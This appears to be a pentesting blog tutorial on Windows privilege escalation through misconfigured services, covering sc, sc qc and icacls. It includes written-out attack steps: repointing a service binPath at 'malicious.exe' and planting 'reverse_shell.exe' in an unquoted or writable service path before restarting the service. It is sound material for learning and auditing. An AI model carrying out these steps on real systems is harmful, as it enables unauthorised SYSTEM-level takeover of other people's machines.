Exploring sc, sc qc, and icacls for Privilege Escalation on Windows
When you land on a Windows machine as a low-privileged user, your next job is to enumerate the environment mercilessly. You want to find services you can hijack, permissions you can abuse, and binaries that’ll help you escalate to SYSTEM. This is where commands like sc, sc qc, and icacls come in.
Let’s break these down and walk through how they’re used by real pentesters in the field.
sc – The Service Control Manager’s Best Friend
sc is a command-line utility that communicates with the Service Control Manager. It allows you to interact with Windows services — start, stop, configure, create, delete.
Key Syntax:
sc query <service_name>
sc qc <service_name>
sc config <service_name> binPath= "C:\path\to\malicious.exe"
Pro tip: Always leave a space after
binPath=or the command will fail silently.
sc qc – Query Service Configuration
This is where the gold often hides. sc qc dumps the configuration of a specific service, showing the executable path, account used to run the service, and more.
Example:
sc qc SomeService
Output:
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SomeService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\SomeApp\app.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Some Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
What to Look For:
- BINARY_PATH_NAME: Is it pointing to a non-quoted path with spaces? That could be exploited via Unquoted Service Path.
- SERVICE_START_NAME: If it runs as
LocalSystemand you can change the binary or restart the service — jackpot.
Example Use Case – Hijacking an Unquoted Service Path
Suppose BINARY_PATH_NAME is:
C:\Program Files\Some App\app.exe
If the path isn’t quoted and you, as a low-priv user, can write to C:\Program Files\Some.exe, Windows might try to run your binary first.
Steps:
copy reverse_shell.exe "C:\Program Files\Some.exe"
net stop SomeService
net start SomeService
icacls – Your ACL (Access Control List) Inspector
icacls is a powerful command-line tool to view and modify NTFS permissions. Use it to check:
- If you have write access to service executables
- If you can write to configuration files, script files, or folders used by services
Basic Usage:
icacls "C:\Program Files\Some App"
Output Example:
BUILTIN\Users:(OI)(CI)(RX)
BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
Everyone:(OI)(CI)(M)
What to Look For:
(M)= Modify(F)= Full control
If Users or Everyone has Modify or Full Control, and the path is part of a running service or loaded binary, you might be able to replace or edit it.
Combined Workflow
Here’s how you might chain these tools together:
- Enumerate services
sc query type= service state= all
- Investigate each service
sc qc <service_name>
- Check permissions on the binary path
icacls "C:\Path\To\Binary.exe"
- Check directory permissions too
icacls "C:\Path\To\"
- Exploit if write access is found and service is restartable
sc stop <service_name>
copy reverse_shell.exe "C:\Path\To\Binary.exe"
sc start <service_name>
PrivEsc Pitfalls to Avoid
- You must be able to restart the service — otherwise you’ll need a reboot or trigger.
- If the service is “critical” and crashes, expect the blue screen of regret.
- Don’t forget AV — dropping payloads in
C:\Program Files\often triggers alarms.
TL;DR – Pentester Cheat Sheet
| Command | Purpose |
|---|---|
sc qc name | View full service config |
sc config | Modify a service (needs privs) |
sc start/stop | Control service execution |
icacls path | View NTFS permissions |
icacls path /grant | Modify permissions (if allowed) |
Final Notes
These commands are basic, but they uncover a surprising amount of privilege escalation vectors — especially in misconfigured enterprise environments. Don’t underestimate the power of a wrongly set permission or a poorly quoted service path.
Keep them in your toolkit. Abuse them wisely.